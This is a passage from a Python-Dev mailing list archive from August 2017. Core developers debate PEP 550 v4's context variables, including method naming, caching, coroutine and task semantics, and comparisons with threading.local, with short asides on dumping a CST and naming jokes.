context, and has similar performance characteristics. > > I think it'll work, but can we agree on hard numbers like max 2% slowdown > for the non-threaded case and 4% for applications that only use threads? I'd be *very* surprised if wee see any noticeable slowdown at all. The way ContextVars will implement caching is very similar to the trick you use now. Yury From yselivanov.ml at gmail.com Sat Aug 26 12:25:24 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 12:25:24 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A0DAB4.2030807@stoneleaf.us> References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote: > All in all, I like it. Nice job. Thanks! > > On 08/25/2017 03:32 PM, Yury Selivanov wrote: > >> A *context variable* is an object representing a value in the >> execution context. A new context variable is created by calling >> the ``new_context_var()`` function. A context variable object has >> two methods: >> >> * ``lookup()``: returns the value of the variable in the current >> execution context; >> >> * ``set()``: sets the value of the variable in the current >> execution context. > > > Why "lookup" and not "get" ? Many APIs use "get" and it's functionality is > well understood. ContextVar.set(value) method writes the `value` to the *topmost LC*. ContextVar.lookup() method *traverses the stack* until it finds the LC that has a value. "get()" does not reflect this subtle semantics difference. Yury From yselivanov.ml at gmail.com Sat Aug 26 12:28:38 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 12:28:38 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 6:22 AM, Stefan Behnel wrote: > Hi, > > I'm aware that the current implementation is not final, but I already > adapted the coroutine changes for Cython to allow for some initial > integration testing with real external (i.e. non-Python coroutine) targets. > I haven't adapted the tests yet, so the changes are currently unused and > mostly untested. > > https://github.com/scoder/cython/tree/pep550_exec_context > > I also left some comments in the github commits along the way. Huge thanks for thinking about how this proposal will work for Cython and trying it out. Although I must warn you that the last reference implementation is very outdated, and the implementation we will end up with will be very different (think a total rewrite from scratch). Yury From barry at python.org Sat Aug 26 12:30:10 2017 From: barry at python.org (Barry Warsaw) Date: Sat, 26 Aug 2017 12:30:10 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A0DAB4.2030807@stoneleaf.us> References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: I agree with David; this PEP has really gotten to a great place and the new organization makes it much easier to understand. > On Aug 25, 2017, at 22:19, Ethan Furman wrote: > > Why "lookup" and not "get" ? Many APIs use "get" and it's functionality is well understood. I have the same question as Sven as to why we can?t have attribute access semantics. I probably asked that before, and you probably answered, so maybe if there?s a specific reason why this can?t be supported, the PEP should include a ?rejected ideas? section explaining the choice. That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`. But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value? I worry that None might be a valid value in some cases, but that currently can?t be distinguished from ?missing?. I?d also like a debugging interface, such that I can ask ?context_var.get()? and get some easy diagnostics about the resolution order. Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From yselivanov.ml at gmail.com Sat Aug 26 12:31:50 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 12:31:50 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> Message-ID: On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote: [..] > Why not the same interface as thread-local storage? This has been the > question which bothered me from the beginning of PEP550. I don't understand > what inventing a new way of access buys us here. This was covered at length in these threads: https://mail.python.org/pipermail/python-ideas/2017-August/046888.html https://mail.python.org/pipermail/python-ideas/2017-August/046889.html I forgot to add a subsection to "Design Consideration" with a summary of that thread. Will be fixed in the next revision. Yury From yselivanov.ml at gmail.com Sat Aug 26 12:35:41 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 12:35:41 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 12:56 AM, David Mertz wrote: > This is now looking really good and I can understands it. Great! > > One question though. Sometimes creation of a context variable is done with a > name argument, other times not. E.g. > > var1 = new_context_var('var1') > var = new_context_var() We were very focused on making the High-level Specification as succinct as possible, omitting some API details that are not important for understanding the semantics. "name" argument is not optional and will be required. If it's optional, people will not provide it, making it very hard to introspect the context when we want it. I guess we'll just update the High-level Specification section to use the correct signature of "new_context_var". Yury From emilyemorehouse at gmail.com Sat Aug 26 12:35:03 2017 From: emilyemorehouse at gmail.com (Emily E Morehouse) Date: Sat, 26 Aug 2017 10:35:03 -0600 Subject: [Python-Dev] how to dump cst In-Reply-To: References: Message-ID: Hi, I believe the parser module allows for generation of a CST, though the documentation is not specific about the type of syntax tree used. The old compiler module utilized it for this purpose and contains explicit documentation about getting a CST from the parser module. -- EMV On Sat, Aug 26, 2017 at 1:53 AM, yang chen wrote: > Hello, everyone. > > > I'm learning python source code, I used to print info when I debug code, > but it's not convenient. I want to print CST, AST, ByteCode with iPython, > wirte some code, then print it's CST?AST? BYTECODE, and then to read the > source code. > > But, I can't dump the CST tree which will transform to AST, I know I can > print CST tree by modifying python source code, but how to dump the CST > tree in iPython just like dumping AST with ast package. > > 1. get AST with ast package2. get ByteCode with dis package > > 3. but how get cst?? > > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > emilyemorehouse%40gmail.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francismb at email.de Sat Aug 26 12:43:05 2017 From: francismb at email.de (francismb) Date: Sat, 26 Aug 2017 18:43:05 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <20170824233221.76ff8934@fsol> References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> <20170824233221.76ff8934@fsol> Message-ID: <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de> >> I propose RaymondLuxuryYach_t, but we?ll have to pronounce it ThroatwobblerMangrove. > > Sorry, but I think we should prononce it ThroatwobblerMangrove. > too hard to pronounce but at least is unique, I would prefer thredarena but I see naming is hard ... :-) Thanks! --francis From barry at python.org Sat Aug 26 12:51:08 2017 From: barry at python.org (Barry Warsaw) Date: Sat, 26 Aug 2017 12:51:08 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de> References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> <20170824233221.76ff8934@fsol> <4872acac-ba35-ba88-2596-2c18d9b28dcc@email.de> Message-ID: On Aug 26, 2017, at 12:43, francismb wrote: > >>> I propose RaymondLuxuryYach_t, but we?ll have to pronounce it ThroatwobblerMangrove. >> >> Sorry, but I think we should prononce it ThroatwobblerMangrove. >> > too hard to pronounce but at least is unique, I would prefer thredarena > but I see naming is hard ... :-) Oh mollusks, I thought you said bacon. -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From mertz at gnosis.cx Sat Aug 26 13:10:26 2017 From: mertz at gnosis.cx (David Mertz) Date: Sat, 26 Aug 2017 10:10:26 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Would it be possible/desirable to make the default a unique string value like a UUID or a stringified counter? On Aug 26, 2017 9:35 AM, "Yury Selivanov" wrote: On Sat, Aug 26, 2017 at 12:56 AM, David Mertz wrote: > This is now looking really good and I can understands it. Great! > > One question though. Sometimes creation of a context variable is done with a > name argument, other times not. E.g. > > var1 = new_context_var('var1') > var = new_context_var() We were very focused on making the High-level Specification as succinct as possible, omitting some API details that are not important for understanding the semantics. "name" argument is not optional and will be required. If it's optional, people will not provide it, making it very hard to introspect the context when we want it. I guess we'll just update the High-level Specification section to use the correct signature of "new_context_var". Yury -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Sat Aug 26 13:15:06 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 13:15:06 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 2:34 AM, Nathaniel Smith wrote: > On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote: >> Coroutines and Asynchronous Tasks >> --------------------------------- >> >> In coroutines, like in generators, context variable changes are local >> and are not visible to the caller:: >> >> import asyncio >> >> var = new_context_var() >> >> async def sub(): >> assert var.lookup() == 'main' >> var.set('sub') >> assert var.lookup() == 'sub' >> >> async def main(): >> var.set('main') >> await sub() >> assert var.lookup() == 'main' >> >> loop = asyncio.get_event_loop() >> loop.run_until_complete(main()) > > I think this change is a bad idea. I think that generally, an async > call like 'await async_sub()' should have the equivalent semantics to > a synchronous call like 'sync_sub()', except for the part where the > former is able to contain yields. That exception is why the semantics cannot be equivalent. > Giving every coroutine an LC breaks > that equivalence. It also makes it so in async code, you can't > necessarily refactor by moving code in and out of subroutines. I'll cover the refactoring argument later in this email. [..] > It also adds non-trivial overhead, because now lookup() is O(depth of > async callstack), instead of O(depth of (async) generator nesting), > which is generally much smaller. I don't think it's non-trivial though: First, we have a cache in ContextVar which makes lookup O(1) for any tight code that uses libraries like decimal and numpy. Second, most of the LCs in the chain will be empty, so even the uncached lookup will still be fast. Third, you will usually have your "with my_context()" block right around your code (or within a few awaits distance), otherwise it will be hard to reason what's the context. And if, occasionally, you have a one single "var.lookup()" call that won't be cached, the cost of it will still be measured in microseconds. Finally, the easy to follow semantics is the main argument for the change (even at the cost of making "get()" a bit slower in corner cases). > > I think I see the motivation: you want to make > > await sub() > > and > > await ensure_future(sub()) > > have the same semantics, right? Yes. > And the latter has to create a Task > and split it off into a new execution context, so you want the former > to do so as well? But to me this is like saying that we want > > sync_sub() > > and > > thread_pool_executor.submit(sync_sub).result() This example is very similar to: await sub() and await create_task(sub()) So it's really about making the semantics for coroutines be predictable. > (And fwiw I'm still not convinced we should give up on 'yield from' as > a mechanism for refactoring generators.) I don't get this "refactoring generators" and "refactoring coroutines" argument. Suppose you have this code: def gen(): i = 0 for _ in range(3): i += 1 yield i for _ in range(5): i += 1 yield i You can't refactor gen() by simply copying/pasting parts of its body into a separate generator: def count3(): for _ in range(3): i += 1 yield def gen(): i = 0 yield from count3() for _ in range(5): i += 1 yield i The above won't work for some obvious reasons: 'i' is a nonlocal variable for 'count3' block of code. Almost exactly the same thing will happen with the current PEP 550 specification, which is a *good* thing. 'yield from' and 'await' are not about refactoring. They can be used for splitting large generators/coroutines into a set of smaller ones, sure. But there's *no* magical, always working, refactoring mechanism that allows to do that blindly. > >> To establish the full semantics of execution context in couroutines, >> we must also consider *tasks*. A task is the abstraction used by >> *asyncio*, and other similar libraries, to manage the concurrent >> execution of coroutines. In the example above, a task is created >> implicitly by the ``run_until_complete()`` function. >> ``asyncio.wait_for()`` is another example of implicit task creation:: >> >> async def sub(): >> await asyncio.sleep(1) >> assert var.lookup() == 'main' >> >> async def main(): >> var.set('main') >> >> # waiting for sub() directly >> await sub() >> >> # waiting for sub() with a timeout >> await asyncio.wait_for(sub(), timeout=2) >> >> var.set('main changed') >> >> Intuitively, we expect the assertion in ``sub()`` to hold true in both >> invocations, even though the ``wait_for()`` implementation actually >> spawns a task, which runs ``sub()`` concurrently with ``main()``. > > I found this example confusing -- you talk about sub() and main() > running concurrently, but ``wait_for`` blocks main() until sub() has > finished running, right? Right. Before we continue, let me make sure we are on the same page here: await asyncio.wait_for(sub(), timeout=2) can be refactored into: task = asyncio.wait_for(sub(), timeout=2) # sub() is scheduled now, and a "loop.call_soon" call has been # made to advance it soon. await task Now, if we look at the following example (1): async def foo(): await bar() The "bar()" coroutine will execute within "foo()". If we add a timeout logic (2): async def foo(): await wait_for(bar() ,1) The "bar()" coroutine will execute outside of "foo()", and "foo()" will only wait for the result of that execution. Now, Async Tasks capture the context when they are created -- that's the only sane option they have. If coroutines don't have their own LC, "bar()" in examples (1) and (2) would interact with the execution context differently! And this is something that we can't let happen, as it would force asyncio users to think about the EC every time they want to wrap a coroutine into a task. [..] >> The ``sys.run_with_logical_context()`` function performs the following >> steps: >> >> 1. Push *lc* onto the current execution context stack. >> 2. Run ``func(*args, **kwargs)``. >> 3. Pop *lc* from the execution context stack. >> 4. Return or raise the ``func()`` result. > > It occurs to me that both this and the way generator/coroutines expose > their logic context means that logical context objects are > semantically mutable. This could create weird effects if someone > attaches the same LC to two different generators, or tries to use it > simultaneously in two different threads, etc. We should have a little > interlock like generator's ag_running, where an LC keeps track of > whether it's currently in use and if you try to push the same LC onto > two ECs simultaneously then it errors out. Correct. Both LC (and EC) objects will be both wrapped into "shell" objects before being exposed to the end user. run_with_logical_context() will mutate the user-visible LC object (keeping the underlying LC immutable, of course). Ideally, we would want run_with_logical_context to have the following signature: result, updated_lc = run_with_logical_context(lc, callable) But because "callable" can raise an exception this would not work. > >> For efficient access in performance-sensitive code paths, such as in >> ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``, >> making it an O(1) operation when the cache is hit. The cache key is >> composed from the following: >> >> * The new ``uint64_t PyThreadState->unique_id``, which is a globally >> unique thread state identifier. It is computed from the new >> ``uint64_t PyInterpreterState->ts_counter``, which is incremented >> whenever a new thread state is created. >> >> * The ``uint64_t ContextVar->version`` counter, which is incremented >> whenever the context variable value is changed in any logical context >> in any thread. > > I'm pretty sure you need to also invalidate on context push/pop. Consider: > > def gen(): > var.set("gen") > var.lookup() # cache now holds "gen" > yield > print(var.lookup()) > > def main(): > var.set("main") > g = gen() > next(g) > # This should print "main", but it's the same thread and the last > call to set() was > # the one inside gen(), so we get the cached "gen" instead > print(var.lookup()) > var.set("no really main") > var.lookup() # cache now holds "no really main" > next(g) # should print "gen" but instead prints "no really main" Yeah, you're right. Thanks! > >> The cache is then implemented as follows:: >> >> class ContextVar: >> >> def set(self, value): >> ... # implementation >> self.version += 1 >> >> >> def get(self): > > I think you missed a s/get/lookup/ here :-) Fixed! Yury From yselivanov.ml at gmail.com Sat Aug 26 13:19:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 13:19:55 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 1:10 PM, David Mertz wrote: > Would it be possible/desirable to make the default a unique string value > like a UUID or a stringified counter? Sure, or we could just use the id of ContextVar. In the end, when we want to introspect the EC while debugging, we would see something like this: { ContextVar(name='518CDD4F-D676-408F-B968-E144F792D055'): 42, ContextVar(name='decimal_context'): DecimalContext(precision=2), ContextVar(name='7A44D3BE-F7A1-40B7-BE51-7DFFA7E0E02F'): 'spam' } That's why I think it's easier to force users always specify the name: my_var = sys.new_context_var('my_var') This is similar to namedtuples, and nobody really complains about them. Yury From ethan at stoneleaf.us Sat Aug 26 13:23:04 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sat, 26 Aug 2017 10:23:04 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: <59A1AE78.6090609@stoneleaf.us> On 08/26/2017 09:25 AM, Yury Selivanov wrote: > On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote: >>> A *context variable* is an object representing a value in the >>> execution context. A new context variable is created by calling >>> the ``new_context_var()`` function. A context variable object has >>> two methods: >>> >>> * ``lookup()``: returns the value of the variable in the current >>> execution context; >>> >>> * ``set()``: sets the value of the variable in the current >>> execution context. >> >> >> Why "lookup" and not "get" ? Many APIs use "get" and it's functionality is >> well understood. > > ContextVar.set(value) method writes the `value` to the *topmost LC*. > > ContextVar.lookup() method *traverses the stack* until it finds the LC > that has a value. "get()" does not reflect this subtle semantics > difference. A good point; however, ChainMap, which behaves similarly as far as lookup goes, uses "get" and does not have a "lookup" method. I think we lose more than we gain by changing that method name. -- ~Ethan~ From yselivanov.ml at gmail.com Sat Aug 26 13:23:00 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 13:23:00 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A1AE78.6090609@stoneleaf.us> References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On Sat, Aug 26, 2017 at 1:23 PM, Ethan Furman wrote: > On 08/26/2017 09:25 AM, Yury Selivanov wrote: >> >> On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote: > > >>>> A *context variable* is an object representing a value in the >>>> execution context. A new context variable is created by calling >>>> the ``new_context_var()`` function. A context variable object has >>>> two methods: >>>> >>>> * ``lookup()``: returns the value of the variable in the current >>>> execution context; >>>> >>>> * ``set()``: sets the value of the variable in the current >>>> execution context. >>> >>> >>> >>> Why "lookup" and not "get" ? Many APIs use "get" and it's functionality >>> is >>> well understood. >> >> >> ContextVar.set(value) method writes the `value` to the *topmost LC*. >> >> ContextVar.lookup() method *traverses the stack* until it finds the LC >> that has a value. "get()" does not reflect this subtle semantics >> difference. > > > A good point; however, ChainMap, which behaves similarly as far as lookup > goes, uses "get" and does not have a "lookup" method. I think we lose more > than we gain by changing that method name. ChainMap is constrained to be a Mapping-like object, but I get your point. Let's see what others say about the "lookup()". It is kind of an experiment to try a name and see if it fits. Yury From ericsnowcurrently at gmail.com Sat Aug 26 13:25:15 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Sat, 26 Aug 2017 11:25:15 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Thanks for the update. Comments in-line below. -eric On Fri, Aug 25, 2017 at 4:32 PM, Yury Selivanov wrote: > [snip] > > This PEP adds a new generic mechanism of ensuring consistent access > to non-local state in the context of out-of-order execution, such > as in Python generators and coroutines. > > Thread-local storage, such as ``threading.local()``, is inadequate for > programs that execute concurrently in the same OS thread. This PEP > proposes a solution to this problem. > [snip] > > In regular, single-threaded code that doesn't involve generators or > coroutines, context variables behave like globals:: > > [snip] > > In multithreaded code, context variables behave like thread locals:: > > [snip] > > In generators, changes to context variables are local and are not > visible to the caller, but are visible to the code called by the > generator. Once set in the generator, the context variable is > guaranteed not to change between iterations:: With threads we have a directed graph of execution, rooted at the root thread, branching with each new thread and merging with each .join(). Each thread gets its own copy of each threading.local, regardless of the relationship between branches (threads) in the execution graph. With async (and generators) we also have a directed graph of execution, rooted in the calling thread, branching with each new async call. Currently there is no equivalent to threading.local for the async execution graph. This proposal involves adding such an equivalent. However, the proposed solution isn''t quite equivalent, right? It adds a concept of lookup on the chain of namespaces, traversing up the execution graph back to the root. threading.local does not do this. Furthermore, you can have more than one threading.local per thread. >From what I read in the PEP, each node in the execution graph has (at most) one Execution Context. The PEP doesn't really say much about these differences from threadlocals, including a rationale. FWIW, I think such a COW mechanism could be useful. However, it does add complexity to the feature. So a clear explanation in the PEP of why it's worth it would be valuable. > [snip] > > The following new Python APIs are introduced by this PEP: > > 1. The ``sys.new_context_var(name: str='...')`` function to create > ``ContextVar`` objects. > > 2. The ``ContextVar`` object, which has: > > * the read-only ``.name`` attribute, > * the ``.lookup()`` method which returns the value of the variable > in the current execution context; > * the ``.set()`` method which sets the value of the variable in > the current execution context. > > 3. The ``sys.get_execution_context()`` function, which returns a > copy of the current execution context. > > 4. The ``sys.new_execution_context()`` function, which returns a new > empty execution context. > > 5. The ``sys.new_logical_context()`` function, which returns a new > empty logical context. > > 6. The ``sys.run_with_execution_context(ec: ExecutionContext, > func, *args, **kwargs)`` function, which runs *func* with the > provided execution context. > > 7. The ``sys.run_with_logical_context(lc:LogicalContext, > func, *args, **kwargs)`` function, which runs *func* with the > provided logical context on top of the current execution context. #1-4 are consistent with a single EC per Python thread. However, #5-7 imply that more than one EC per thread is supported, but only one is active in the current execution stack (notably the EC is rooted at the calling frame). threading.local provides a much simpler mechanism but does not support the chained context (COW) semantics... From ericsnowcurrently at gmail.com Sat Aug 26 13:33:27 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Sat, 26 Aug 2017 11:33:27 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 11:19 AM, Yury Selivanov wrote: > This is similar to namedtuples, and nobody really complains about them. FWIW, there are plenty of complaints on python-ideas about this (and never a satisfactory solution). :) That said, I don't think it is as big a deal here since the target audience is much smaller. -eric From yselivanov.ml at gmail.com Sat Aug 26 14:02:24 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 14:02:24 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Hi Eric, On Sat, Aug 26, 2017 at 1:25 PM, Eric Snow wrote: > Thanks for the update. Comments in-line below. > > -eric > > On Fri, Aug 25, 2017 at 4:32 PM, Yury Selivanov wrote: >> [snip] >> >> This PEP adds a new generic mechanism of ensuring consistent access >> to non-local state in the context of out-of-order execution, such >> as in Python generators and coroutines. >> >> Thread-local storage, such as ``threading.local()``, is inadequate for >> programs that execute concurrently in the same OS thread. This PEP >> proposes a solution to this problem. > >> [snip] >> >> In regular, single-threaded code that doesn't involve generators or >> coroutines, context variables behave like globals:: >> >> [snip] >> >> In multithreaded code, context variables behave like thread locals:: >> >> [snip] >> >> In generators, changes to context variables are local and are not >> visible to the caller, but are visible to the code called by the >> generator. Once set in the generator, the context variable is >> guaranteed not to change between iterations:: > > With threads we have a directed graph of execution, rooted at the root > thread, branching with each new thread and merging with each .join(). > Each thread gets its own copy of each threading.local, regardless of > the relationship between branches (threads) in the execution graph. > > With async (and generators) we also have a directed graph of > execution, rooted in the calling thread, branching with each new async > call. Currently there is no equivalent to threading.local for the > async execution graph. This proposal involves adding such an > equivalent. Correct. > > However, the proposed solution isn''t quite equivalent, right? It > adds a concept of lookup on the chain of namespaces, traversing up the > execution graph back to the root. threading.local does not do this. > Furthermore, you can have more than one threading.local per thread. > From what I read in the PEP, each node in the execution graph has (at > most) one Execution Context. > > The PEP doesn't really say much about these differences from > threadlocals, including a rationale. FWIW, I think such a COW > mechanism could be useful. However, it does add complexity to the > feature. So a clear explanation in the PEP of why it's worth it would > be valuable. Currently, the PEP covers the proposed mechanism in-depth, explaining why every detail of the spec is the way it is. But I think it'd be valuable to highlight differences from theading.local() in a separate section. We'll think about adding one. Yury From yselivanov.ml at gmail.com Sat Aug 26 14:15:41 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 14:15:41 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: On Sat, Aug 26, 2017 at 12:30 PM, Barry Warsaw wrote: > I agree with David; this PEP has really gotten to a great place and the new organization makes it much easier to understand. > >> On Aug 25, 2017, at 22:19, Ethan Furman wrote: >> >> Why "lookup" and not "get" ? Many APIs use "get" and it's functionality is well understood. > > I have the same question as Sven as to why we can?t have attribute access semantics. I probably asked that before, and you probably answered, so maybe if there?s a specific reason why this can?t be supported, the PEP should include a ?rejected ideas? section explaining the choice. Elvis just added it: https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface > > That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`. But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value? I worry that None might be a valid value in some cases, but that currently can?t be distinguished from ?missing?. Nathaniel has a use case where he needs to know if the value is in the topmost LC or not. One way to address that need is to have the following signature for lookup(): lookup(*, default=None, traverse=True) IMO "lookup" is a slightly better name in this particular context. Yury From barry at python.org Sat Aug 26 14:22:39 2017 From: barry at python.org (Barry Warsaw) Date: Sat, 26 Aug 2017 14:22:39 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> On Aug 26, 2017, at 14:15, Yury Selivanov wrote: > > Elvis just added it: > https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface Thanks, that?s exactly what I was looking for. Great summary of the issue. > >> That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`. But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value? I worry that None might be a valid value in some cases, but that currently can?t be distinguished from ?missing?. > > Nathaniel has a use case where he needs to know if the value is in the > topmost LC or not. > > One way to address that need is to have the following signature for lookup(): > > lookup(*, default=None, traverse=True) > > IMO "lookup" is a slightly better name in this particular context. Given that signature (which +1), I agree. You could add keywords for debugging lookup fairly easily too. Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From srkunze at mail.de Sat Aug 26 14:30:36 2017 From: srkunze at mail.de (Sven R. Kunze) Date: Sat, 26 Aug 2017 20:30:36 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: <67222d19-ece6-2cac-a60b-cd3ad65f416a@mail.de> On 26.08.2017 19:23, Yury Selivanov wrote: > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about the "lookup()". It is kind of > an experiment to try a name and see if it fits. I like "get" more. ;-) Best, Sven PS: This might be a result of still leaning towards attribute access despite the discussion you referenced. I still don't think complicating and reinventing terminology (which basically results in API names) buys us much. And I am still with Ethan, a context stack is just a ChainMap. Renaming basic methods won't hide that fact. That's my only criticism of the PEP. The rest is fine and useful. -------------- next part -------------- An HTML attachment was scrubbed... URL: From mertz at gnosis.cx Sat Aug 26 15:12:02 2017 From: mertz at gnosis.cx (David Mertz) Date: Sat, 26 Aug 2017 12:12:02 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> References: <59A0DAB4.2030807@stoneleaf.us> <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> Message-ID: I'm convinced by the new section explaining why a single value is better than a namespace. Nonetheless, it would feel more "Pythonic" to me to create a property `ContextVariable.val` whose getter and setter was `.lookup()` and `.set()` (or maybe `._lookup()` and `._set()`). Lookup might require a more complex call signature in rare cases, but the large majority of the time it would simply be `var.val`, and that should be the preferred API IMO. That provides a nice parallel between `var.name` and `var.val` also. On Sat, Aug 26, 2017 at 11:22 AM, Barry Warsaw wrote: > On Aug 26, 2017, at 14:15, Yury Selivanov wrote: > > > > Elvis just added it: > > https://www.python.org/dev/peps/pep-0550/#replication-of- > threading-local-interface > > Thanks, that?s exactly what I was looking for. Great summary of the issue. > > > >> That said, if we have to use method lookup, then I agree that `.get()` > is a better choice than `.lookup()`. But in that case, would it be > possible to add an optional `default=None` argument so that you can specify > a marker object for a missing value? I worry that None might be a valid > value in some cases, but that currently can?t be distinguished from > ?missing?. > > > > Nathaniel has a use case where he needs to know if the value is in the > > topmost LC or not. > > > > One way to address that need is to have the following signature for > lookup(): > > > > lookup(*, default=None, traverse=True) > > > > IMO "lookup" is a slightly better name in this particular context. > > Given that signature (which +1), I agree. You could add keywords for > debugging lookup fairly easily too. > > Cheers, > -Barry > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > mertz%40gnosis.cx > > -- Keeping medicines from the bloodstreams of the sick; food from the bellies of the hungry; books from the hands of the uneducated; technology from the underdeveloped; and putting advocates of freedom in prisons. Intellectual property is to the 21st century what the slave trade was to the 16th. -------------- next part -------------- An HTML attachment was scrubbed... URL: From francismb at email.de Sat Aug 26 15:36:02 2017 From: francismb at email.de (francismb) Date: Sat, 26 Aug 2017 21:36:02 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <7b28e890-68ee-04cb-dfe6-acabb9cde9b7@email.de> Hi, > > For the purpose of this section, we define *execution context* as an > opaque container of non-local state that allows consistent access to > its contents in the concurrent execution environment. > May be nonsense/non-practical :-), but : - How extrapolates this concept to the whole interpreter (container of ...non-local state --> interpreter state; concurrent execution environment --> python interpreter, ...) ? Thank in advance ! -- francis From solipsis at pitrou.net Sat Aug 26 16:23:47 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Sat, 26 Aug 2017 22:23:47 +0200 Subject: [Python-Dev] PEP 550 v4 References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: <20170826222347.2374d6ac@fsol> On Sat, 26 Aug 2017 13:23:00 -0400 Yury Selivanov wrote: > > > > A good point; however, ChainMap, which behaves similarly as far as lookup > > goes, uses "get" and does not have a "lookup" method. I think we lose more > > than we gain by changing that method name. > > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about the "lookup()". It is kind of > an experiment to try a name and see if it fits. I like "get()" better than "lookup()". Regards Antoine. From francismb at email.de Sat Aug 26 16:45:07 2017 From: francismb at email.de (francismb) Date: Sat, 26 Aug 2017 22:45:07 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <67011615-0c66-b610-6887-052ff65c97f1@email.de> Hi, > Multithreaded Code > ------------------ > > In multithreaded code, context variables behave like thread locals:: > > var = new_context_var() > > def sub(): > assert var.lookup() is None # The execution context is empty > # for each new thread. > var.set('sub') > > def main(): > var.set('main') > > thread = threading.Thread(target=sub) > thread.start() > thread.join() > > assert var.lookup() == 'main' > it's by design that the execution context for new threads to be empty or should it be possible to set it to some initial value? Like 